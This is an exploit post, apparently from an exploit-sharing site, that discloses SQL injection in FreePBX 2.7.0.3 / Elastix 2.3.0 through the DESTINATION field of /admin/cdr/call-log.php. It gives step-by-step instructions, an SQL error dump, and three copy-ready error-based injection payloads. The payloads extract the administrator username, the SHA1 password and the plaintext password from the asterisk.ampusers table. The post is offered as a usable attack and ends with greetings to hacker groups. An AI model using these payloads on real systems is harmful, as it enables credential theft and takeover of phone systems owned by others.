facebook facebook twitter rss

SQL injection in FreePBX 2.7.0.3 / Elastix 2.3.0

Author: Sc4nX , Published: 05-01-2013
# Exploit Title: SQL injection in FreePBX 2.7.0.3 / Elastix 2.3.0
# Google Dork: N/A
# Date: 05/01/2013
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Vendor Homepage: http://www.freepbx.org
# Software Link: http://www.freepbx.org/download-freepbx
# Tested on: Linux / Win 7

SQL Injection:
1 - Go to - /admin/cdr/call-log.php
2 - Insert Your code 1' in DESTINATION vulnerability: SELECT substring(calldate,1,10) AS day, sum(duration) AS calltime,
count(*) as nbcall FROM cdr

WHERE dst='10'' AND src = 'NeverReturnAnything' AND src = 'NeverReturnAnything' GROUP BY substring(calldate,1,10)
[nativecode=1064 ** You have an

error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
near 'NeverReturnAnything' AND src =

'NeverReturnAnything' GROUP BY substring(calldate' at line 1]
3 - submit and now you belong to whatever usergroup to choice to belong to

Exploit :
1 - To See The Username use
Code : 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(ampusers.username) FROM
`asterisk`.ampusers LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
2 - To See The Passowrd sha1
Code : 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(ampusers.password_sha1) FROM
`asterisk`.ampusers LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3 - To See The Password with out sha1
Code : 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(ampusers.password) FROM
`asterisk`.ampusers LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

====================
GZ : Dr.Hacker (Ahmed) - All Sec4ever.com - Big TrOuBlE
The End :P

Like us on Facebook :